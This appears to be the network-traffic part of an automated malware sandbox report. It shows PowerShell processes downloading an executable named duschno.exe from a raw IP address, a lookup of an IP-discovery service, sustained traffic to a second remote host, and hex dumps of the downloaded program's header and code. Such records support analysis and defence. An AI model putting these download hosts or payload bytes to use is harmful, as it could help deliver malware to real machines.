Dec 19, 2024 08:52:47.263221979 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.263262987 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.263320923 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.263360023 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.263375044 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.263408899 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.263430119 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.263533115 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.263578892 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.263667107 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.263722897 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.263773918 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.263819933 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.263911963 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.264041901 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.264096975 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.264143944 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.264158010 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.264184952 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.264226913 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.264261961 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.264348030 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.264400005 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.264403105 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.264446020 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.264518023 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.264591932 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.264687061 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.264748096 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.264765978 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.264813900 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.264894962 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.265007973 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.265022039 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.265069962 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.265091896 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.265111923 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.265183926 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.265242100 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.265310049 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.265367985 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.265398979 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.265444994 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.265464067 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.267885923 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.306073904 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.308208942 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.340892076 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.341013908 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.359436989 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.359513998 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.359558105 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.359642029 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.398778915 CET	15666	49737	193.3.19.151	192.168.2.4
Dec 19, 2024 08:52:47.400094986 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.400168896 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.400197983 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.400836945 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.400898933 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.400939941 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.400990963 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.401034117 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.401077032 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.401120901 CET	49737	15666	192.168.2.4	193.3.19.151
Dec 19, 2024 08:52:47.401158094 CET	49737	15666	192.168.2.4	193.3.19.151

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 19, 2024 08:52:39.949491978 CET	192.168.2.4	1.1.1.1	0x7606	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Dec 19, 2024 08:52:40.086815119 CET	1.1.1.1	192.168.2.4	0x7606	No error (0)	api.ipify.org	104.26.12.205	A (IP address)	IN (0x0001)	false
Dec 19, 2024 08:52:40.086815119 CET	1.1.1.1	192.168.2.4	0x7606	No error (0)	api.ipify.org	172.67.74.152	A (IP address)	IN (0x0001)	false
Dec 19, 2024 08:52:40.086815119 CET	1.1.1.1	192.168.2.4	0x7606	No error (0)	api.ipify.org	104.26.13.205	A (IP address)	IN (0x0001)	false

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	147.45.47.15	80	7844	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 08:52:35.547643900 CET	168	OUT	GET /duschno.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: 147.45.47.15 Connection: Keep-Alive
Dec 19, 2024 08:52:36.805109978 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 07:52:36 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 09 Dec 2024 20:28:42 GMT ETag: "13ba00-628dc35e76e87" Accept-Ranges: bytes Content-Length: 1292800 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c6 4e af 37 82 2f c1 64 82 2f c1 64 82 2f c1 64 c9 57 c6 65 83 2f c1 64 c9 57 c7 65 83 2f c1 64 ca aa c5 65 9b 2f c1 64 92 ab c2 65 8a 2f c1 64 92 ab c5 65 92 2f c1 64 92 ab c4 65 e0 2f c1 64 c9 57 c4 65 38 2f c1 64 c9 57 c2 65 85 2f c1 64 c9 57 c5 65 97 2f c1 64 82 2f c0 64 a5 2e c1 64 c9 57 c0 65 9d 2f c1 64 c9 aa c8 65 9d 2f c1 64 c9 aa 3e 64 83 2f c1 64 c9 aa c3 65 83 2f c1 64 52 69 63 68 82 2f c1 64 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 9d 37 3b 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 29 00 34 0d 00 00 a6 06 00 00 00 00 00 20 f2 0a 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$N7/d/d/dWe/dWe/de/de/de/de/dWe8/dWe/dWe/d/d.dWe/de/d>d/de/dRich/dPEd7;g")4 @`h@l<8(@Px.text24 `.rdataxP8@@.data\|Z@.pdataln<@@.rsrc@@.reloc<@B
Dec 19, 2024 08:52:36.805356979 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: H\$Ht$H\|$ UATAUAVAWH$H+H~\|H@H@HH/*OHzH@H@HH>=-)H@H@H
Dec 19, 2024 08:52:36.805366993 CET	1236	IN	Data Raw: b5 40 14 00 00 48 8b 85 40 14 00 00 48 89 44 24 20 48 89 bd 40 14 00 00 48 8b 85 40 14 00 00 48 89 44 24 28 66 0f 6f 45 a0 0f 57 44 24 20 66 0f 7f 45 a0 0f 57 c0 0f 11 85 88 07 00 00 4c 89 b5 98 07 00 00 4c 89 b5 a0 07 00 00 48 8d 45 a0 4c 8b c3 Data Ascii: @H@HD$ H@H@HD$(foEWD$ fEWLLHELIB<uHUHqHxaH@H@HEH&!'H@H@HEH@H@HD$ H@H@HD$(foEWD$ fEWW
Dec 19, 2024 08:52:36.806304932 CET	1236	IN	Data Raw: c3 66 0f 1f 84 00 00 00 00 00 49 ff c0 42 80 3c 00 00 75 f6 48 8d 55 10 48 8d 8d 88 08 00 00 e8 46 6d 04 00 90 4c 89 bd 40 14 00 00 48 8b 85 40 14 00 00 48 89 45 20 48 89 bd 40 14 00 00 48 8b 85 40 14 00 00 48 89 45 28 48 89 b5 40 14 00 00 48 8b Data Ascii: fIB<uHUHFmL@H@HE H@H@HE(H@H@HD$ H@H@HD$(foE WD$ fE WLLHE LIB<uHU HlHhaH@H@HE0H@H@HE8H
Dec 19, 2024 08:52:36.806313038 CET	496	IN	Data Raw: 00 48 89 44 24 48 48 b8 fd 98 41 20 d0 d3 e5 a6 48 89 85 40 14 00 00 48 8b 85 40 14 00 00 48 89 44 24 50 48 89 8d 40 14 00 00 48 8b 85 40 14 00 00 48 89 44 24 58 66 0f 6f 85 80 06 00 00 0f 57 44 24 20 66 0f 7f 85 80 06 00 00 66 0f 6f 8d 90 06 00 Data Ascii: HD$HHA H@H@HD$PH@H@HD$XfoWD$ ffoWL$0ffoWD$@ffoWL$PfW`WpHLIB<uHH`gHpmH@H@HEpH7X'H@
Dec 19, 2024 08:52:36.806827068 CET	1236	IN	Data Raw: 40 14 00 00 48 8b 85 40 14 00 00 48 89 44 24 20 48 89 bd 40 14 00 00 48 8b 85 40 14 00 00 48 89 44 24 28 4c 89 a5 40 14 00 00 48 8b 85 40 14 00 00 48 89 44 24 30 4c 89 ad 40 14 00 00 48 8b 85 40 14 00 00 48 89 44 24 38 66 0f 6f 85 20 04 00 00 0f Data Ascii: @H@HD$ H@H@HD$(L@H@HD$0L@H@HD$8fo WD$ f fo0WL$0f0WLLH LIB<uH HeIizL@H@HH@H@HH@H@
Dec 19, 2024 08:52:36.806839943 CET	1236	IN	Data Raw: 00 48 89 85 68 04 00 00 4c 89 a5 40 14 00 00 48 8b 85 40 14 00 00 48 89 85 70 04 00 00 4c 89 ad 40 14 00 00 48 8b 85 40 14 00 00 48 89 85 78 04 00 00 48 89 b5 40 14 00 00 48 8b 85 40 14 00 00 48 89 44 24 20 48 89 bd 40 14 00 00 48 8b 85 40 14 00 Data Ascii: HhL@H@HpL@H@HxH@H@HD$ H@H@HD$(L@H@HD$0L@H@HD$8fo`WD$ f`fopWL$0fpWWH`LIB<uH`H`L@H@
Dec 19, 2024 08:52:36.807848930 CET	448	IN	Data Raw: 00 00 02 00 00 00 4c 89 bd 40 14 00 00 48 8b 85 40 14 00 00 48 89 85 a0 04 00 00 48 b8 41 e3 17 62 7b 74 b3 b6 48 89 85 40 14 00 00 48 8b 85 40 14 00 00 48 89 85 a8 04 00 00 48 b8 2f 35 26 a5 4c 7e b3 fe 48 89 85 40 14 00 00 48 8b 85 40 14 00 00 Data Ascii: L@H@HHAb{tH@H@HH/5&L~H@H@HL@H@HH@H@HD$ H@H@HD$(HI\AL~H@H@HD$0L@H@HD$8foWD$ ffoWL$0fW
Dec 19, 2024 08:52:36.807858944 CET	1236	IN	Data Raw: c0 42 80 3c 00 00 75 f6 48 8d 95 00 01 00 00 48 8d 8d 78 0b 00 00 e8 23 5b 04 00 90 c7 85 98 0b 00 00 02 00 00 00 48 b8 ee 65 7a e1 87 95 dc f5 48 89 85 40 14 00 00 48 8b 85 40 14 00 00 48 89 85 10 01 00 00 48 89 bd 40 14 00 00 48 8b 85 40 14 00 Data Ascii: B<uHHx#[HezH@H@HH@H@HH@H@HD$ H@H@HD$(foWD$ fWWHLIB<uHHmZIezL@H@H I
Dec 19, 2024 08:52:36.807873964 CET	1236	IN	Data Raw: dc f5 48 89 85 40 14 00 00 48 8b 85 40 14 00 00 48 89 85 40 01 00 00 48 89 bd 40 14 00 00 48 8b 85 40 14 00 00 48 89 85 48 01 00 00 48 89 b5 40 14 00 00 48 8b 85 40 14 00 00 48 89 44 24 20 48 89 bd 40 14 00 00 48 8b 85 40 14 00 00 48 89 44 24 28 Data Ascii: H@H@H@H@H@HHH@H@HD$ H@H@HD$(fo@WD$ f@WPW`H@L@IB<uH@HPUpIpyL@H@HI!H{TL@H@HH,
Dec 19, 2024 08:52:36.925235033 CET	1236	IN	Data Raw: 8b 85 40 14 00 00 48 89 85 50 05 00 00 4c 89 ad 40 14 00 00 48 8b 85 40 14 00 00 48 89 85 58 05 00 00 48 89 b5 40 14 00 00 48 8b 85 40 14 00 00 48 89 44 24 20 48 89 bd 40 14 00 00 48 8b 85 40 14 00 00 48 89 44 24 28 48 b8 49 5c 41 a5 4c 7e b3 fe Data Ascii: @HPL@H@HXH@H@HD$ H@H@HD$(HI\AL~H@H@HD$0L@H@HD$8fo@WD$ f@foPWL$0fPWLL H@LfIB<uH@HPL@H@H

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	147.45.47.15	80	7952	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 08:52:35.781760931 CET	168	OUT	GET /duschno.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: 147.45.47.15 Connection: Keep-Alive
Dec 19, 2024 08:52:37.032314062 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 07:52:36 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 09 Dec 2024 20:28:42 GMT ETag: "13ba00-628dc35e76e87" Accept-Ranges: bytes Content-Length: 1292800 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c6 4e af 37 82 2f c1 64 82 2f c1 64 82 2f c1 64 c9 57 c6 65 83 2f c1 64 c9 57 c7 65 83 2f c1 64 ca aa c5 65 9b 2f c1 64 92 ab c2 65 8a 2f c1 64 92 ab c5 65 92 2f c1 64 92 ab c4 65 e0 2f c1 64 c9 57 c4 65 38 2f c1 64 c9 57 c2 65 85 2f c1 64 c9 57 c5 65 97 2f c1 64 82 2f c0 64 a5 2e c1 64 c9 57 c0 65 9d 2f c1 64 c9 aa c8 65 9d 2f c1 64 c9 aa 3e 64 83 2f c1 64 c9 aa c3 65 83 2f c1 64 52 69 63 68 82 2f c1 64 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 9d 37 3b 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 29 00 34 0d 00 00 a6 06 00 00 00 00 00 20 f2 0a 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$N7/d/d/dWe/dWe/de/de/de/de/dWe8/dWe/dWe/d/d.dWe/de/d>d/de/dRich/dPEd7;g")4 @`h@l<8(@Px.text24 `.rdataxP8@@.data\|Z@.pdataln<@@.rsrc@@.reloc<@B
Dec 19, 2024 08:52:37.032322884 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: H\$Ht$H\|$ UATAUAVAWH$H+H~\|H@H@HH/*OHzH@H@HH>=-)H@H@H
Dec 19, 2024 08:52:37.032339096 CET	1236	IN	Data Raw: b5 40 14 00 00 48 8b 85 40 14 00 00 48 89 44 24 20 48 89 bd 40 14 00 00 48 8b 85 40 14 00 00 48 89 44 24 28 66 0f 6f 45 a0 0f 57 44 24 20 66 0f 7f 45 a0 0f 57 c0 0f 11 85 88 07 00 00 4c 89 b5 98 07 00 00 4c 89 b5 a0 07 00 00 48 8d 45 a0 4c 8b c3 Data Ascii: @H@HD$ H@H@HD$(foEWD$ fEWLLHELIB<uHUHqHxaH@H@HEH&!'H@H@HEH@H@HD$ H@H@HD$(foEWD$ fEWW
Dec 19, 2024 08:52:37.032906055 CET	1236	IN	Data Raw: c3 66 0f 1f 84 00 00 00 00 00 49 ff c0 42 80 3c 00 00 75 f6 48 8d 55 10 48 8d 8d 88 08 00 00 e8 46 6d 04 00 90 4c 89 bd 40 14 00 00 48 8b 85 40 14 00 00 48 89 45 20 48 89 bd 40 14 00 00 48 8b 85 40 14 00 00 48 89 45 28 48 89 b5 40 14 00 00 48 8b Data Ascii: fIB<uHUHFmL@H@HE H@H@HE(H@H@HD$ H@H@HD$(foE WD$ fE WLLHE LIB<uHU HlHhaH@H@HE0H@H@HE8H
Dec 19, 2024 08:52:37.032913923 CET	1236	IN	Data Raw: 00 48 89 44 24 48 48 b8 fd 98 41 20 d0 d3 e5 a6 48 89 85 40 14 00 00 48 8b 85 40 14 00 00 48 89 44 24 50 48 89 8d 40 14 00 00 48 8b 85 40 14 00 00 48 89 44 24 58 66 0f 6f 85 80 06 00 00 0f 57 44 24 20 66 0f 7f 85 80 06 00 00 66 0f 6f 8d 90 06 00 Data Ascii: HD$HHA H@H@HD$PH@H@HD$XfoWD$ ffoWL$0ffoWD$@ffoWL$PfW`WpHLIB<uHH`gHpmH@H@HEpH7X'H@
Dec 19, 2024 08:52:37.033694983 CET	1236	IN	Data Raw: 58 54 63 b3 aa 48 89 85 40 14 00 00 48 8b 85 40 14 00 00 48 89 85 48 04 00 00 48 b8 2c 5c 41 a5 4c 7e b3 fe 48 89 85 40 14 00 00 48 8b 85 40 14 00 00 48 89 85 50 04 00 00 4c 89 ad 40 14 00 00 48 8b 85 40 14 00 00 48 89 85 58 04 00 00 48 89 b5 40 Data Ascii: XTcH@H@HHH,\AL~H@H@HPL@H@HXH@H@HD$ H@H@HD$(L@H@HD$0L@H@HD$8fo@WD$ f@foPWL$0fPW8LHLPH@LIB<uH
Dec 19, 2024 08:52:37.033704042 CET	1236	IN	Data Raw: e0 00 00 00 48 8d 8d e8 0a 00 00 e8 de 5e 04 00 90 c7 85 08 0b 00 00 02 00 00 00 4c 89 bd 40 14 00 00 48 8b 85 40 14 00 00 48 89 85 80 04 00 00 48 b8 41 e3 17 62 7b 60 bd b4 48 89 85 40 14 00 00 48 8b 85 40 14 00 00 48 89 85 88 04 00 00 48 b8 25 Data Ascii: H^L@H@HHAb{`H@H@HH%95L~H@H@HL@H@HH@H@HD$ H@H@HD$(L@H@HD$0L@H@HD$8foWD$ ffoWL$0f
Dec 19, 2024 08:52:37.034475088 CET	1000	IN	Data Raw: 89 bd 40 14 00 00 48 8b 85 40 14 00 00 48 89 44 24 28 66 0f 6f 85 20 01 00 00 0f 57 44 24 20 66 0f 7f 85 20 01 00 00 0f 57 c0 0f 11 85 c0 0b 00 00 0f 57 c9 f3 0f 7f 8d d0 0b 00 00 48 8d 85 20 01 00 00 4c 8b c3 0f 1f 40 00 49 ff c0 42 80 3c 00 00 Data Ascii: @H@HD$(fo WD$ f WWH L@IB<uH HYHezH@H@HI"MDL@H@HH;=&H@H@HH[U5H@H@HH@
Dec 19, 2024 08:52:37.034485102 CET	1236	IN	Data Raw: 00 00 48 89 44 24 20 48 89 bd 40 14 00 00 48 8b 85 40 14 00 00 48 89 44 24 28 66 0f 6f 85 40 01 00 00 0f 57 44 24 20 66 0f 7f 85 40 01 00 00 0f 57 c0 0f 11 85 50 0c 00 00 0f 57 c9 f3 0f 7f 8d 60 0c 00 00 48 8d 85 40 01 00 00 4c 8b c3 0f 1f 40 00 Data Ascii: HD$ H@H@HD$(fo@WD$ f@WPW`H@L@IB<uH@HPUpIpyL@H@HI!H{TL@H@HH,25H@H@HH[M5H@H@H
Dec 19, 2024 08:52:37.035353899 CET	1236	IN	Data Raw: 40 14 00 00 48 8b 85 40 14 00 00 48 89 44 24 28 48 b8 49 5c 41 a5 4c 7e b3 fe 48 89 85 40 14 00 00 48 8b 85 40 14 00 00 48 89 44 24 30 4c 89 ad 40 14 00 00 48 8b 85 40 14 00 00 48 89 44 24 38 66 0f 6f 85 40 05 00 00 0f 57 44 24 20 66 0f 7f 85 40 Data Ascii: @H@HD$(HI\AL~H@H@HD$0L@H@HD$8fo@WD$ f@foPWL$0fPWLL H@LfIB<uH@HPL@H@HpI/0I'L@H@HxH@H@HD$
Dec 19, 2024 08:52:37.152420044 CET	1236	IN	Data Raw: 14 00 00 48 89 85 b8 01 00 00 48 89 b5 40 14 00 00 48 8b 85 40 14 00 00 48 89 44 24 20 48 89 bd 40 14 00 00 48 8b 85 40 14 00 00 48 89 44 24 28 66 0f 6f 85 b0 01 00 00 0f 57 44 24 20 66 0f 7f 85 b0 01 00 00 0f 57 c0 0f 11 85 e0 0d 00 00 0f 57 c9 Data Ascii: HH@H@HD$ H@H@HD$(foWD$ fWWHLfDIB<uHHLL@H@HH@H@HH@H@HD$ H@H@HD$(foWD$ fW

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49732	147.45.47.15	80	8136	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Dec 19, 2024 08:52:35.821428061 CET	168	OUT	GET /duschno.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: 147.45.47.15 Connection: Keep-Alive
Dec 19, 2024 08:52:37.078047991 CET	1236	IN	HTTP/1.1 200 OK Date: Thu, 19 Dec 2024 07:52:36 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 09 Dec 2024 20:28:42 GMT ETag: "13ba00-628dc35e76e87" Accept-Ranges: bytes Content-Length: 1292800 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c6 4e af 37 82 2f c1 64 82 2f c1 64 82 2f c1 64 c9 57 c6 65 83 2f c1 64 c9 57 c7 65 83 2f c1 64 ca aa c5 65 9b 2f c1 64 92 ab c2 65 8a 2f c1 64 92 ab c5 65 92 2f c1 64 92 ab c4 65 e0 2f c1 64 c9 57 c4 65 38 2f c1 64 c9 57 c2 65 85 2f c1 64 c9 57 c5 65 97 2f c1 64 82 2f c0 64 a5 2e c1 64 c9 57 c0 65 9d 2f c1 64 c9 aa c8 65 9d 2f c1 64 c9 aa 3e 64 83 2f c1 64 c9 aa c3 65 83 2f c1 64 52 69 63 68 82 2f c1 64 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 9d 37 3b 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 29 00 34 0d 00 00 a6 06 00 00 00 00 00 20 f2 0a 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$N7/d/d/dWe/dWe/de/de/de/de/dWe8/dWe/dWe/d/d.dWe/de/d>d/de/dRich/dPEd7;g")4 @`h@l<8(@Px.text24 `.rdataxP8@@.data\|Z@.pdataln<@@.rsrc@@.reloc<@B
Dec 19, 2024 08:52:37.078203917 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: H\$Ht$H\|$ UATAUAVAWH$H+H~\|H@H@HH/*OHzH@H@HH>=-)H@H@H
Dec 19, 2024 08:52:37.078221083 CET	1236	IN	Data Raw: b5 40 14 00 00 48 8b 85 40 14 00 00 48 89 44 24 20 48 89 bd 40 14 00 00 48 8b 85 40 14 00 00 48 89 44 24 28 66 0f 6f 45 a0 0f 57 44 24 20 66 0f 7f 45 a0 0f 57 c0 0f 11 85 88 07 00 00 4c 89 b5 98 07 00 00 4c 89 b5 a0 07 00 00 48 8d 45 a0 4c 8b c3 Data Ascii: @H@HD$ H@H@HD$(foEWD$ fEWLLHELIB<uHUHqHxaH@H@HEH&!'H@H@HEH@H@HD$ H@H@HD$(foEWD$ fEWW
Dec 19, 2024 08:52:37.078928947 CET	1236	IN	Data Raw: c3 66 0f 1f 84 00 00 00 00 00 49 ff c0 42 80 3c 00 00 75 f6 48 8d 55 10 48 8d 8d 88 08 00 00 e8 46 6d 04 00 90 4c 89 bd 40 14 00 00 48 8b 85 40 14 00 00 48 89 45 20 48 89 bd 40 14 00 00 48 8b 85 40 14 00 00 48 89 45 28 48 89 b5 40 14 00 00 48 8b Data Ascii: fIB<uHUHFmL@H@HE H@H@HE(H@H@HD$ H@H@HD$(foE WD$ fE WLLHE LIB<uHU HlHhaH@H@HE0H@H@HE8H
Dec 19, 2024 08:52:37.078941107 CET	1236	IN	Data Raw: 00 48 89 44 24 48 48 b8 fd 98 41 20 d0 d3 e5 a6 48 89 85 40 14 00 00 48 8b 85 40 14 00 00 48 89 44 24 50 48 89 8d 40 14 00 00 48 8b 85 40 14 00 00 48 89 44 24 58 66 0f 6f 85 80 06 00 00 0f 57 44 24 20 66 0f 7f 85 80 06 00 00 66 0f 6f 8d 90 06 00 Data Ascii: HD$HHA H@H@HD$PH@H@HD$XfoWD$ ffoWL$0ffoWD$@ffoWL$PfW`WpHLIB<uHH`gHpmH@H@HEpH7X'H@
Dec 19, 2024 08:52:37.079752922 CET	1236	IN	Data Raw: 58 54 63 b3 aa 48 89 85 40 14 00 00 48 8b 85 40 14 00 00 48 89 85 48 04 00 00 48 b8 2c 5c 41 a5 4c 7e b3 fe 48 89 85 40 14 00 00 48 8b 85 40 14 00 00 48 89 85 50 04 00 00 4c 89 ad 40 14 00 00 48 8b 85 40 14 00 00 48 89 85 58 04 00 00 48 89 b5 40 Data Ascii: XTcH@H@HHH,\AL~H@H@HPL@H@HXH@H@HD$ H@H@HD$(L@H@HD$0L@H@HD$8fo@WD$ f@foPWL$0fPW8LHLPH@LIB<uH
